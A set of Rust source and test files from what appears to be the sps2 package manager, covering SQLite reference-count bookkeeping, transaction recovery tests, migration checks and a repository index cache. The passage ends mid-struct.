alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/src/db/mod.rs | crates/state/src/db/mod.rs | pub mod refcount_deltas;
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/src/db/refcount_deltas.rs | crates/state/src/db/refcount_deltas.rs | use sps2_errors::{Error, StateError};
use sps2_types::StateId;
use sqlx::{query, Sqlite, Transaction};
/// Ensure CAS rows exist for archives referenced by the target state.
///
/// Seeds missing `cas_objects` rows (kind 'archive') with `ref_count = 0`
/// so the subsequent UPDATE-based increments have rows to act on; existing
/// rows are left untouched by `INSERT OR IGNORE`.
///
/// # Errors
///
/// Returns an error if the database operation fails.
async fn ensure_archive_cas_rows(
    tx: &mut Transaction<'_, Sqlite>,
    to_state: &StateId,
) -> Result<(), Error> {
    let to_str = to_state.to_string();
    query(
        r#"
        INSERT OR IGNORE INTO cas_objects (hash, kind, size_bytes, created_at, ref_count)
        SELECT DISTINCT pv.store_hash, 'archive', pv.size_bytes, strftime('%s','now'), 0
        FROM state_packages sp
        JOIN package_versions pv ON pv.id = sp.package_version_id
        WHERE sp.state_id = ?1 AND pv.store_hash IS NOT NULL
        "#,
    )
    .bind(&to_str)
    .execute(&mut **tx)
    .await
    .map_err(|e| StateError::DatabaseError {
        message: format!("ensure archive cas rows failed: {e}"),
    })?;
    Ok(())
}
/// Calculate archive refcount increases for new hashes.
///
/// With a `from_state`: increments only hashes present in `to_state` but not
/// in `from_state` (set difference via `EXCEPT`). Without one (initial
/// state): increments every hash referenced by `to_state`. Returns the
/// number of rows updated.
///
/// # Errors
///
/// Returns an error if the database operation fails.
async fn calculate_archive_increases(
    tx: &mut Transaction<'_, Sqlite>,
    from_state: Option<&StateId>,
    to_state: &StateId,
) -> Result<u64, Error> {
    let to_str = to_state.to_string();
    Ok(if let Some(from) = from_state {
        let from_str = from.to_string();
        query(
            r#"
            WITH
            to_hashes AS (
                SELECT DISTINCT pv.store_hash AS hash
                FROM state_packages sp
                JOIN package_versions pv ON pv.id = sp.package_version_id
                WHERE sp.state_id = ?1
            ),
            from_hashes AS (
                SELECT DISTINCT pv.store_hash AS hash
                FROM state_packages sp
                JOIN package_versions pv ON pv.id = sp.package_version_id
                WHERE sp.state_id = ?2
            ),
            new_hashes AS (
                SELECT hash FROM to_hashes
                EXCEPT
                SELECT hash FROM from_hashes
            )
            UPDATE cas_objects
            SET ref_count = ref_count + 1
            WHERE kind = 'archive' AND hash IN (SELECT hash FROM new_hashes)
            "#,
        )
        .bind(&to_str)
        .bind(&from_str)
        .execute(&mut **tx)
        .await?
        .rows_affected()
    } else {
        query(
            r#"
            UPDATE cas_objects
            SET ref_count = ref_count + 1
            WHERE kind = 'archive' AND hash IN (
                SELECT DISTINCT pv.store_hash
                FROM state_packages sp
                JOIN package_versions pv ON pv.id = sp.package_version_id
                WHERE sp.state_id = ?1
            )
            "#,
        )
        .bind(&to_str)
        .execute(&mut **tx)
        .await?
        .rows_affected()
    })
}
/// Calculate archive refcount decreases for removed hashes.
///
/// Mirror image of [`calculate_archive_increases`]: decrements hashes
/// present in `from_state` but not in `to_state`. With no `from_state`
/// there is nothing to decrement, so 0 is returned.
///
/// # Errors
///
/// Returns an error if the database operation fails.
async fn calculate_archive_decreases(
    tx: &mut Transaction<'_, Sqlite>,
    from_state: Option<&StateId>,
    to_state: &StateId,
) -> Result<u64, Error> {
    let to_str = to_state.to_string();
    Ok(if let Some(from) = from_state {
        let from_str = from.to_string();
        query(
            r#"
            WITH
            to_hashes AS (
                SELECT DISTINCT pv.store_hash AS hash
                FROM state_packages sp
                JOIN package_versions pv ON pv.id = sp.package_version_id
                WHERE sp.state_id = ?1
            ),
            from_hashes AS (
                SELECT DISTINCT pv.store_hash AS hash
                FROM state_packages sp
                JOIN package_versions pv ON pv.id = sp.package_version_id
                WHERE sp.state_id = ?2
            ),
            removed_hashes AS (
                SELECT hash FROM from_hashes
                EXCEPT
                SELECT hash FROM to_hashes
            )
            UPDATE cas_objects
            SET ref_count = ref_count - 1
            WHERE kind = 'archive' AND hash IN (SELECT hash FROM removed_hashes)
            "#,
        )
        .bind(&to_str)
        .bind(&from_str)
        .execute(&mut **tx)
        .await?
        .rows_affected()
    } else {
        0
    })
}
/// Apply archive refcount deltas when transitioning from `from_state` -> `to_state`.
///
/// Returns `(rows_incremented, rows_decremented)`.
///
/// # Errors
///
/// Returns an error if the database operations fail.
pub async fn apply_archive_refcount_deltas(
    tx: &mut Transaction<'_, Sqlite>,
    from_state: Option<&StateId>,
    to_state: &StateId,
) -> Result<(u64, u64), Error> {
    // Rows must exist (seeded at ref_count 0) before the UPDATE-based
    // increments can touch them.
    ensure_archive_cas_rows(tx, to_state).await?;
    let incremented = calculate_archive_increases(tx, from_state, to_state).await?;
    let decremented = calculate_archive_decreases(tx, from_state, to_state).await?;
    Ok((incremented, decremented))
}
/// Ensure verification rows exist for file hashes.
///
/// Seeds `file_verification` rows in 'pending' status for every file hash
/// referenced by `to_state`. Failures are deliberately swallowed via `.ok()`
/// — this is best-effort bookkeeping, not part of the refcount invariant.
///
/// # Errors
///
/// This function does not return errors as it uses `.ok()` to ignore them.
async fn ensure_file_verification_rows(tx: &mut Transaction<'_, Sqlite>, to_state: &StateId) {
    let to_str = to_state.to_string();
    query(
        r#"
        INSERT OR IGNORE INTO file_verification (file_hash, status, attempts, last_checked_at, last_error)
        SELECT DISTINCT pf.file_hash, 'pending', 0, NULL, NULL
        FROM state_packages sp
        JOIN package_files pf ON pf.package_version_id = sp.package_version_id
        WHERE sp.state_id = ?1
        "#,
    )
    .bind(&to_str)
    .execute(&mut **tx)
    .await
    .ok();
}
/// Calculate file refcount increases for new hashes.
///
/// Same EXCEPT-based set difference as the archive variant, but over
/// `package_files.file_hash` and kind 'file'; also refreshes `last_seen_at`.
/// Without a `from_state`, every file hash in `to_state` is incremented.
/// Returns the number of rows updated.
///
/// # Errors
///
/// Returns an error if the database operation fails.
async fn calculate_file_increases(
    tx: &mut Transaction<'_, Sqlite>,
    from_state: Option<&StateId>,
    to_state: &StateId,
) -> Result<u64, Error> {
    let to_str = to_state.to_string();
    Ok(if let Some(from) = from_state {
        let from_str = from.to_string();
        query(
            r#"
            WITH
            to_hashes AS (
                SELECT DISTINCT pf.file_hash AS hash
                FROM state_packages sp
                JOIN package_files pf ON pf.package_version_id = sp.package_version_id
                WHERE sp.state_id = ?1
            ),
            from_hashes AS (
                SELECT DISTINCT pf.file_hash AS hash
                FROM state_packages sp
                JOIN package_files pf ON pf.package_version_id = sp.package_version_id
                WHERE sp.state_id = ?2
            ),
            new_hashes AS (
                SELECT hash FROM to_hashes
                EXCEPT
                SELECT hash FROM from_hashes
            )
            UPDATE cas_objects
            SET ref_count = ref_count + 1,
                last_seen_at = strftime('%s','now')
            WHERE kind = 'file' AND hash IN (SELECT hash FROM new_hashes)
            "#,
        )
        .bind(&to_str)
        .bind(&from_str)
        .execute(&mut **tx)
        .await?
        .rows_affected()
    } else {
        query(
            r#"
            UPDATE cas_objects
            SET ref_count = ref_count + 1,
                last_seen_at = strftime('%s','now')
            WHERE kind = 'file' AND hash IN (
                SELECT DISTINCT pf.file_hash
                FROM state_packages sp
                JOIN package_files pf ON pf.package_version_id = sp.package_version_id
                WHERE sp.state_id = ?1
            )
            "#,
        )
        .bind(&to_str)
        .execute(&mut **tx)
        .await?
        .rows_affected()
    })
}
/// Calculate file refcount decreases for removed hashes.
///
/// Decrements file hashes present in `from_state` but not in `to_state`;
/// with no `from_state` there is nothing to decrement, so 0 is returned.
///
/// # Errors
///
/// Returns an error if the database operation fails.
async fn calculate_file_decreases(
    tx: &mut Transaction<'_, Sqlite>,
    from_state: Option<&StateId>,
    to_state: &StateId,
) -> Result<u64, Error> {
    let to_str = to_state.to_string();
    Ok(if let Some(from) = from_state {
        let from_str = from.to_string();
        query(
            r#"
            WITH
            to_hashes AS (
                SELECT DISTINCT pf.file_hash AS hash
                FROM state_packages sp
                JOIN package_files pf ON pf.package_version_id = sp.package_version_id
                WHERE sp.state_id = ?1
            ),
            from_hashes AS (
                SELECT DISTINCT pf.file_hash AS hash
                FROM state_packages sp
                JOIN package_files pf ON pf.package_version_id = sp.package_version_id
                WHERE sp.state_id = ?2
            ),
            removed_hashes AS (
                SELECT hash FROM from_hashes
                EXCEPT
                SELECT hash FROM to_hashes
            )
            UPDATE cas_objects
            SET ref_count = ref_count - 1
            WHERE kind = 'file' AND hash IN (SELECT hash FROM removed_hashes)
            "#,
        )
        .bind(&to_str)
        .bind(&from_str)
        .execute(&mut **tx)
        .await?
        .rows_affected()
    } else {
        0
    })
}
/// Apply file-object refcount deltas when transitioning from `from_state` -> `to_state`.
///
/// Returns `(rows_incremented, rows_decremented)`.
///
/// # Errors
///
/// Returns an error if the database operations fail.
pub async fn apply_file_refcount_deltas(
    tx: &mut Transaction<'_, Sqlite>,
    from_state: Option<&StateId>,
    to_state: &StateId,
) -> Result<(u64, u64), Error> {
    let incremented = calculate_file_increases(tx, from_state, to_state).await?;
    // Best-effort seeding of verification rows between the two updates
    // (order kept as-is from the original implementation).
    ensure_file_verification_rows(tx, to_state).await;
    let decremented = calculate_file_decreases(tx, from_state, to_state).await?;
    Ok((incremented, decremented))
}
/// Apply both archive and file refcount deltas.
///
/// Returns `((archive_inc, archive_dec), (file_inc, file_dec))`.
///
/// # Errors
///
/// Returns an error if either the archive or file refcount operations fail.
pub async fn apply_all_refcount_deltas(
    tx: &mut Transaction<'_, Sqlite>,
    from_state: Option<&StateId>,
    to_state: &StateId,
) -> Result<((u64, u64), (u64, u64)), Error> {
    // Archives first, then individual file objects.
    let archive_deltas = apply_archive_refcount_deltas(tx, from_state, to_state).await?;
    let file_deltas = apply_file_refcount_deltas(tx, from_state, to_state).await?;
    Ok((archive_deltas, file_deltas))
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/tests/queries_runtime_v2.rs | crates/state/tests/queries_runtime_v2.rs | use sps2_hash::Hash;
use tempfile::TempDir;
#[tokio::test]
async fn add_and_fetch_package_round_trip() {
    // Fresh on-disk database per test; TempDir cleans up on drop.
    let temp_dir = TempDir::new().expect("tempdir");
    let db_path = temp_dir.path().join("state.sqlite");
    let pool = sps2_state::create_pool(&db_path)
        .await
        .expect("create pool");
    sps2_state::run_migrations(&pool)
        .await
        .expect("run migrations");
    let state_id = uuid::Uuid::new_v4();
    // Write: create a state, activate it, and add one package.
    let mut tx = pool.begin().await.expect("begin tx");
    sps2_state::queries::create_state(&mut tx, &state_id, None, "install")
        .await
        .expect("create state");
    sps2_state::queries::set_active_state(&mut tx, &state_id)
        .await
        .expect("set active state");
    let pkg_row =
        sps2_state::queries::add_package(&mut tx, &state_id, "hello", "1.0.0", "store-hash", 42)
            .await
            .expect("add package");
    tx.commit().await.expect("commit");
    // Read back in a second transaction and verify every stored field.
    let mut tx = pool.begin().await.expect("begin tx2");
    let packages = sps2_state::queries::get_state_packages(&mut tx, &state_id)
        .await
        .expect("get packages");
    assert_eq!(packages.len(), 1);
    let pkg = &packages[0];
    assert_eq!(pkg.id, pkg_row);
    assert_eq!(pkg.name, "hello");
    assert_eq!(pkg.version, "1.0.0");
    assert_eq!(pkg.hash, "store-hash");
    assert_eq!(pkg.size, 42);
}
#[tokio::test]
async fn add_file_object_and_entry_round_trip() {
    use sps2_state::file_queries_runtime as files;
    use sps2_state::queries;
    let temp_dir = TempDir::new().expect("tempdir");
    let db_path = temp_dir.path().join("state.sqlite");
    let pool = sps2_state::create_pool(&db_path)
        .await
        .expect("create pool");
    sps2_state::run_migrations(&pool)
        .await
        .expect("run migrations");
    let state_id = uuid::Uuid::new_v4();
    let mut tx = pool.begin().await.expect("begin tx");
    queries::create_state(&mut tx, &state_id, None, "install")
        .await
        .expect("create state");
    queries::set_active_state(&mut tx, &state_id)
        .await
        .expect("set active state");
    let pkg_row = queries::add_package(&mut tx, &state_id, "pkg", "1.0.0", "store-hash", 10)
        .await
        .expect("add package");
    // Register a file object (content-addressed by hash) plus its metadata …
    let file_hash = Hash::from_data(b"hello-file");
    let metadata = sps2_state::file_models::FileMetadata {
        size: 5,
        permissions: 0o755,
        uid: 0,
        gid: 0,
        mtime: None,
        is_executable: true,
        is_symlink: false,
        symlink_target: None,
    };
    files::add_file_object(&mut tx, &file_hash, &metadata)
        .await
        .expect("add file object");
    // … and link it to the package under a relative path.
    let file_ref = sps2_state::file_models::FileReference {
        package_id: pkg_row,
        relative_path: "bin/hello".to_string(),
        hash: file_hash.clone(),
        metadata: metadata.clone(),
    };
    files::add_package_file_entry(&mut tx, pkg_row, &file_ref)
        .await
        .expect("add file entry");
    tx.commit().await.expect("commit");
    // Verify the entry round-trips with the same path and hex hash.
    let mut tx = pool.begin().await.expect("begin tx2");
    let entries = files::get_package_file_entries(&mut tx, pkg_row)
        .await
        .expect("get file entries");
    assert_eq!(entries.len(), 1);
    let entry = &entries[0];
    assert_eq!(entry.relative_path, "bin/hello");
    assert_eq!(entry.file_hash, file_hash.to_hex());
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/tests/recovery.rs | crates/state/tests/recovery.rs | //! tests/recovery.rs
use sps2_state::PackageRef;
use sps2_state::StateManager;
use sps2_state::TransactionData;
use sps2_types::Version;
use tempfile::TempDir;
use uuid::Uuid;
// Build a fresh StateManager rooted in a new temp dir. The TempDir must be
// returned alongside the manager so it stays alive for the test's duration.
async fn mk_state() -> (TempDir, StateManager) {
    let td = TempDir::new().expect("tempdir");
    let mgr = StateManager::new(td.path()).await.expect("state new");
    (td, mgr)
}
#[tokio::test]
async fn test_recovers_from_prepared_state() {
    let (_td, state) = mk_state().await;
    let parent_id = state.get_current_state_id().await.unwrap();
    // 1. Prepare a transaction, which writes the journal in the `Prepared` state.
    let staging_id = Uuid::new_v4();
    let pkg_hash = sps2_hash::Hash::from_data(b"prepared-pkg").to_hex();
    let pid = sps2_resolver::PackageId::new("A".to_string(), Version::parse("1.0.0").unwrap());
    let pref = PackageRef {
        state_id: staging_id,
        package_id: pid.clone(),
        hash: pkg_hash.clone(),
        size: 1,
    };
    let td = TransactionData {
        package_refs: &[pref],
        file_references: &[],
        pending_file_hashes: &[],
    };
    let staging_slot = state.inactive_slot().await;
    let journal = state
        .prepare_transaction(&staging_id, &parent_id, staging_slot, "install", &td)
        .await
        .unwrap();
    // At this point, a crash happens. The journal file exists.
    // The live directory should still point to the parent state.
    let live_path = state.live_path().to_path_buf();
    assert!(
        !live_path.join("A-1.0.0").exists(),
        "Live dir should not be updated yet"
    );
    // 2. Simulate an application restart by creating a new StateManager.
    //    The new manager should automatically run recovery.
    let state_base_path = _td.path().to_path_buf();
    let new_state_manager = StateManager::new(&state_base_path).await.unwrap();
    // 3. Verify the outcome.
    // The new state should be active.
    let active_id = new_state_manager.get_current_state_id().await.unwrap();
    assert_eq!(active_id, staging_id);
    // The journal file should be gone.
    let journal_path = state_base_path.join("transaction.json");
    assert!(
        tokio::fs::metadata(&journal_path).await.is_err(),
        "Journal file should be cleared after recovery"
    );
    // The live directory should have been swapped.
    // We can't easily check the content here without more setup, but we can check the slot state.
    let active_slot = new_state_manager.active_slot().await;
    assert_eq!(active_slot, journal.staging_slot);
    let new_slot_state = new_state_manager.slot_state(active_slot).await;
    assert_eq!(new_slot_state, Some(staging_id));
}
#[tokio::test]
async fn test_recovers_from_swapped_state() {
    let (_td, state) = mk_state().await;
    let parent_id = state.get_current_state_id().await.unwrap();
    // 1. Prepare a transaction (no packages needed for this phase test).
    let staging_id = Uuid::new_v4();
    let td = TransactionData {
        package_refs: &[],
        file_references: &[],
        pending_file_hashes: &[],
    };
    let staging_slot = state.inactive_slot().await;
    let mut journal = state
        .prepare_transaction(&staging_id, &parent_id, staging_slot, "test", &td)
        .await
        .unwrap();
    // 2. Manually perform the swap and update the journal to the `Swapped` phase.
    {
        let mut slots = state.live_slots.lock().await; // Assuming live_slots is public for test
        slots
            .swap_to_live(
                journal.staging_slot,
                journal.new_state_id,
                journal.parent_state_id,
            )
            .await
            .unwrap();
    }
    journal.phase = sps2_types::state::TransactionPhase::Swapped;
    state.write_journal(&journal).await.unwrap();
    // At this point, a crash happens. The filesystem is updated, but the DB is not.
    let db_active_id = state.get_current_state_id().await.unwrap();
    assert_eq!(
        db_active_id, parent_id,
        "DB active state should not be updated yet"
    );
    // 3. Simulate an application restart.
    let state_base_path = _td.path().to_path_buf();
    let new_state_manager = StateManager::new(&state_base_path).await.unwrap();
    // 4. Verify the outcome.
    // The new state should be active in the DB.
    let active_id = new_state_manager.get_current_state_id().await.unwrap();
    assert_eq!(active_id, staging_id);
    // The journal file should be gone.
    let journal_path = state_base_path.join("transaction.json");
    assert!(
        tokio::fs::metadata(&journal_path).await.is_err(),
        "Journal file should be cleared after recovery"
    );
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/tests/migration_smoke.rs | crates/state/tests/migration_smoke.rs | use tempfile::TempDir;
/// Running the migration suite against a fresh database must create every
/// core table the state layer relies on.
#[tokio::test]
async fn migrations_apply_and_expose_core_tables() {
    let temp_dir = TempDir::new().expect("temp dir");
    let db_path = temp_dir.path().join("state.sqlite");

    let pool = sps2_state::create_pool(&db_path)
        .await
        .expect("create pool");
    sps2_state::run_migrations(&pool)
        .await
        .expect("run migrations");

    let mut conn = pool.acquire().await.expect("acquire connection");

    // Every table required by the state layer must exist post-migration.
    let expected_tables = [
        "states",
        "state_packages",
        "package_versions",
        "cas_objects",
        "package_files",
        "file_verification",
    ];
    for table in expected_tables {
        let exists: Option<i64> =
            sqlx::query_scalar("SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?1")
                .bind(table)
                .fetch_optional(&mut *conn)
                .await
                .expect("check table existence");
        assert!(exists.is_some(), "expected table `{table}` to exist");
    }
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/index/src/lib.rs | crates/index/src/lib.rs | #![warn(mismatched_lifetime_syntaxes)]
#![deny(clippy::pedantic, unsafe_code)]
#![allow(clippy::module_name_repetitions)]
//! Package repository index for sps2
//!
//! This crate handles the repository index that lists all available
//! packages and their versions. The index is cached locally for
//! offline use and validated for freshness.
mod cache;
mod models;
pub use cache::IndexCache;
pub use models::{
DependencyInfo, Index, IndexMetadata, PackageEntry, SbomEntry, SbomInfo, VersionEntry,
};
use chrono::Utc;
use sps2_errors::Error;
use sps2_types::{package::PackageSpec, Version};
// HashMap removed - not used
use std::path::Path;
/// Newest index format version this client can parse; indexes reporting a
/// higher `version` are rejected by `Index::validate`.
pub const SUPPORTED_INDEX_VERSION: u32 = 1;
/// Repository index manager
#[derive(Clone, Debug)]
pub struct IndexManager {
    /// Currently loaded index; `None` until `load` succeeds.
    index: Option<Index>,
    /// On-disk cache used for offline access to the index.
    pub cache: IndexCache,
}
impl IndexManager {
/// Create a new index manager with cache directory
pub fn new(cache_dir: impl AsRef<Path>) -> Self {
Self {
index: None,
cache: IndexCache::new(cache_dir),
}
}
/// Load index from cache or JSON content
///
/// # Errors
///
/// Returns an error if the JSON content is invalid, cache cannot be read,
/// or the index fails validation.
pub async fn load(&mut self, content: Option<&str>) -> Result<(), Error> {
let index = if let Some(json) = content {
// Parse provided content
Index::from_json(json)?
} else {
// Try to load from cache
self.cache.load().await?
};
// Validate index
index.validate()?;
self.index = Some(index);
Ok(())
}
/// Save current index to cache
///
/// # Errors
///
/// Returns an error if the cache cannot be written to disk.
pub async fn save_to_cache(&self) -> Result<(), Error> {
if let Some(index) = &self.index {
self.cache.save(index).await?;
}
Ok(())
}
/// Get the loaded index
#[must_use]
pub fn index(&self) -> Option<&Index> {
self.index.as_ref()
}
/// Search for packages by name (prefix match)
pub fn search(&self, query: &str) -> Vec<&str> {
let Some(index) = &self.index else {
return Vec::new();
};
let query_lower = query.to_lowercase();
let mut results: Vec<&str> = index
.packages
.keys()
.filter(|name| name.to_lowercase().starts_with(&query_lower))
.map(String::as_str)
.collect();
results.sort_unstable();
results
}
/// Get all versions of a package
#[must_use]
pub fn get_package_versions(&self, name: &str) -> Option<Vec<&VersionEntry>> {
let index = self.index.as_ref()?;
let package = index.packages.get(name)?;
let mut versions: Vec<(&String, &VersionEntry)> = package.versions.iter().collect();
versions.sort_by(|a, b| {
// Sort by version descending (newest first)
Version::parse(b.0)
.unwrap_or_else(|_| Version::new(0, 0, 0))
.cmp(&Version::parse(a.0).unwrap_or_else(|_| Version::new(0, 0, 0)))
});
Some(versions.into_iter().map(|(_, entry)| entry).collect())
}
/// Get all versions of a package, including their version strings
/// sorted by version descending (newest first)
#[must_use]
pub fn get_package_versions_with_strings(
&self,
name: &str,
) -> Option<Vec<(&str, &VersionEntry)>> {
let index = self.index.as_ref()?;
let package = index.packages.get(name)?;
let mut versions: Vec<(&String, &VersionEntry)> = package.versions.iter().collect();
versions.sort_by(|a, b| {
// Sort by version descending (newest first)
Version::parse(b.0)
.unwrap_or_else(|_| Version::new(0, 0, 0))
.cmp(&Version::parse(a.0).unwrap_or_else(|_| Version::new(0, 0, 0)))
});
Some(
versions
.into_iter()
.map(|(v, entry)| (v.as_str(), entry))
.collect(),
)
}
/// Find the best version matching a spec
#[must_use]
pub fn find_best_version(&self, spec: &PackageSpec) -> Option<&VersionEntry> {
self.find_best_version_with_string(spec)
.map(|(_, entry)| entry)
}
/// Find the best version matching a spec, returning both version string and entry
#[must_use]
pub fn find_best_version_with_string(
&self,
spec: &PackageSpec,
) -> Option<(&str, &VersionEntry)> {
let index = self.index.as_ref()?;
let package = index.packages.get(&spec.name)?;
// Collect versions with their version strings, sort by version descending
let mut versions: Vec<(&String, &VersionEntry)> = package.versions.iter().collect();
versions.sort_by(|a, b| {
// Sort by version descending (newest first)
Version::parse(b.0)
.unwrap_or_else(|_| Version::new(0, 0, 0))
.cmp(&Version::parse(a.0).unwrap_or_else(|_| Version::new(0, 0, 0)))
});
// Find highest version that satisfies the spec
versions.into_iter().find_map(|(version_str, entry)| {
if let Ok(version) = Version::parse(version_str) {
if spec.version_spec.matches(&version) {
Some((version_str.as_str(), entry))
} else {
None
}
} else {
None
}
})
}
/// Get a specific version entry
#[must_use]
pub fn get_version(&self, name: &str, version: &str) -> Option<&VersionEntry> {
self.index
.as_ref()?
.packages
.get(name)?
.versions
.get(version)
}
/// Check if index is stale (older than `max_age_days`)
#[must_use]
pub fn is_stale(&self, max_age_days: u32) -> bool {
let Some(index) = &self.index else {
return true;
};
let max_age = chrono::Duration::days(i64::from(max_age_days));
let age = Utc::now() - index.metadata.timestamp;
age > max_age
}
/// Get index metadata
#[must_use]
pub fn metadata(&self) -> Option<&IndexMetadata> {
self.index.as_ref().map(|i| &i.metadata)
}
/// Set index directly (primarily for testing)
///
/// This method bypasses validation and should only be used in tests.
#[doc(hidden)]
pub fn set_index(&mut self, index: Index) {
self.index = Some(index);
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/index/src/cache.rs | crates/index/src/cache.rs | //! Index caching functionality
use crate::models::Index;
use sps2_errors::{Error, StorageError};
use std::path::{Path, PathBuf};
use tokio::fs;
/// Index cache manager
#[derive(Clone, Debug)]
pub struct IndexCache {
    /// Directory holding `index.json` and its `index.meta` (`ETag`) sidecar.
    cache_dir: PathBuf,
}
impl IndexCache {
/// Create a new cache manager
pub fn new(cache_dir: impl AsRef<Path>) -> Self {
Self {
cache_dir: cache_dir.as_ref().to_path_buf(),
}
}
/// Get the index cache file path
fn index_path(&self) -> PathBuf {
self.cache_dir.join("index.json")
}
/// Get the index metadata file path (for `ETag`, etc.)
fn metadata_path(&self) -> PathBuf {
self.cache_dir.join("index.meta")
}
/// Load index from cache
///
/// # Errors
///
/// Returns an error if the cache file doesn't exist or contains invalid data.
pub async fn load(&self) -> Result<Index, Error> {
let path = self.index_path();
let content = fs::read_to_string(&path)
.await
.map_err(|_e| StorageError::PathNotFound {
path: path.display().to_string(),
})?;
Index::from_json(&content)
}
/// Save index to cache
///
/// # Errors
///
/// Returns an error if the cache directory cannot be created or the file cannot be written.
pub async fn save(&self, index: &Index) -> Result<(), Error> {
// Ensure cache directory exists
fs::create_dir_all(&self.cache_dir)
.await
.map_err(|e| StorageError::IoError {
message: format!("failed to create cache dir: {e}"),
})?;
let path = self.index_path();
let json = index.to_json()?;
// Write to temporary file first
let temp_path = path.with_extension("tmp");
fs::write(&temp_path, &json)
.await
.map_err(|e| StorageError::IoError {
message: format!("failed to write cache: {e}"),
})?;
// Atomic rename
fs::rename(&temp_path, &path)
.await
.map_err(|e| StorageError::IoError {
message: format!("failed to rename cache file: {e}"),
})?;
Ok(())
}
/// Check if cache exists
pub async fn exists(&self) -> bool {
fs::metadata(self.index_path()).await.is_ok()
}
/// Get cache age in seconds
///
/// # Errors
///
/// Returns an error if file metadata cannot be read or timestamps are invalid.
pub async fn age(&self) -> Result<Option<u64>, Error> {
let path = self.index_path();
match fs::metadata(&path).await {
Ok(metadata) => {
let modified = metadata.modified().map_err(|e| StorageError::IoError {
message: format!("failed to get modification time: {e}"),
})?;
let age = std::time::SystemTime::now()
.duration_since(modified)
.map(|d| d.as_secs())
.unwrap_or(0);
Ok(Some(age))
}
Err(_) => Ok(None),
}
}
/// Clear the cache
///
/// # Errors
///
/// This function does not return errors as file removal failures are ignored.
pub async fn clear(&self) -> Result<(), Error> {
let _ = fs::remove_file(self.index_path()).await;
let _ = fs::remove_file(self.metadata_path()).await;
Ok(())
}
/// Load cached `ETag`
///
/// # Errors
///
/// Does not return errors - missing files return `None`.
pub async fn load_etag(&self) -> Result<Option<String>, Error> {
let path = self.metadata_path();
match fs::read_to_string(&path).await {
Ok(content) => {
// Simple format: first line is ETag
Ok(content.lines().next().map(String::from))
}
Err(_) => Ok(None),
}
}
/// Save `ETag`
///
/// # Errors
///
/// Returns an error if the metadata file cannot be written.
pub async fn save_etag(&self, etag: &str) -> Result<(), Error> {
let path = self.metadata_path();
fs::write(&path, etag)
.await
.map_err(|e| StorageError::IoError {
message: format!("failed to save ETag: {e}"),
})?;
Ok(())
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/index/src/models.rs | crates/index/src/models.rs | //! Index data models
use chrono::{DateTime, Utc};
use serde::{Deserialize, Serialize};
use sps2_errors::{Error, PackageError};
use sps2_types::Arch;
use std::collections::HashMap;
/// Repository index: top-level metadata plus the full package catalog
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Index {
    // Flattened so metadata fields appear at the top level of the JSON document.
    #[serde(flatten)]
    pub metadata: IndexMetadata,
    /// Package name -> entry listing all published versions.
    pub packages: HashMap<String, PackageEntry>,
}
/// Index metadata
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct IndexMetadata {
    /// Index format version (compared against `SUPPORTED_INDEX_VERSION`).
    pub version: u32,
    /// Minimum client version for this index — NOTE(review): not checked in
    /// the code visible here; confirm where it is enforced.
    pub minimum_client: String,
    /// When the index was generated; used for staleness checks.
    pub timestamp: DateTime<Utc>,
}
/// Package entry in index
#[derive(Debug, Clone, Default, Serialize, Deserialize)]
pub struct PackageEntry {
    /// Version string -> metadata for that released version.
    pub versions: HashMap<String, VersionEntry>,
}
/// Version entry in index
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct VersionEntry {
    /// Package revision number for this version.
    pub revision: u32,
    /// Target architecture string; validation accepts only "arm64".
    pub arch: String,
    /// BLAKE3 hash of the package artifact (download verification).
    pub blake3: String,
    /// URL to fetch the package artifact from.
    pub download_url: String,
    /// URL of the minisign signature for the artifact.
    pub minisig_url: String,
    /// Runtime and build dependency lists.
    pub dependencies: DependencyInfo,
    /// Optional SBOM locations for this version.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub sbom: Option<SbomInfo>,
    /// Optional human-readable package description.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub description: Option<String>,
    /// Optional project homepage URL.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub homepage: Option<String>,
    /// Optional license identifier.
    #[serde(skip_serializing_if = "Option::is_none")]
    pub license: Option<String>,
}
/// Dependency information
#[derive(Debug, Clone, Default, Serialize, Deserialize)]
pub struct DependencyInfo {
    /// Runtime dependencies (defaults to empty if absent in the JSON).
    #[serde(default)]
    pub runtime: Vec<String>,
    /// Build-time dependencies (defaults to empty if absent in the JSON).
    #[serde(default)]
    pub build: Vec<String>,
}
/// SBOM information
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct SbomInfo {
    /// SPDX document location and hash (always present when SBOM data exists).
